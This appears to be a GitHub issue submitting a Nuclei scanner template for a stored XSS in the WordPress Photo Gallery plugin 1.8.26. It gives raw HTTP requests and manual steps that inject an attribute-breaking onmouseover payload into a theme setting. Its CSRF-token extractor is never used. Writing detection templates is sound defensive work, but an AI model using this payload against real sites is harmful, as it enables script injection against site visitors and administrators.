wordpress-photo-gallery-xss

[0xr2r]

Is there an existing template for this?

• I have searched the existing templates.

Nuclei Template

id: wordpress-photo-gallery-xss

info:
  name: WordPress Photo Gallery Plugin Stored XSS
  author: 0xr2r
  severity: high
  description: |
    Detects stored XSS vulnerability in WordPress Photo Gallery plugin version 1.8.26. The payload is injected in the "Distance between pictures" field and executes when the page is loaded.
  tags: wordpress,xss,stored,plugin
  reference:
    - https://10web.io/plugins/wordpress-photo-gallery/

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{cookie}}

        distance_between_pictures="onmouseover=\"alert(1)\"style=\"position:absolute;width:100%;height:100%;top:0;left:0;\"qq9r3"

    extractors:
      - type: regex
        name: csrf_token
        part: body
        regex:
          - '<input\s+type="hidden"\s+name="_wpnonce"\s+value="([a-zA-Z0-9]+)"' # Extract CSRF token
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{cookie}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "onmouseover=\"alert(1)\""
      - type: word
        part: header
        words:
          - "text/html"

Relevant dumped responses

### Steps to Execute the Payload:

1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 
2. Write Distance between pictures place your payload**: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`
3. Click Update
4. You will see the payload executed

Anything else?

No response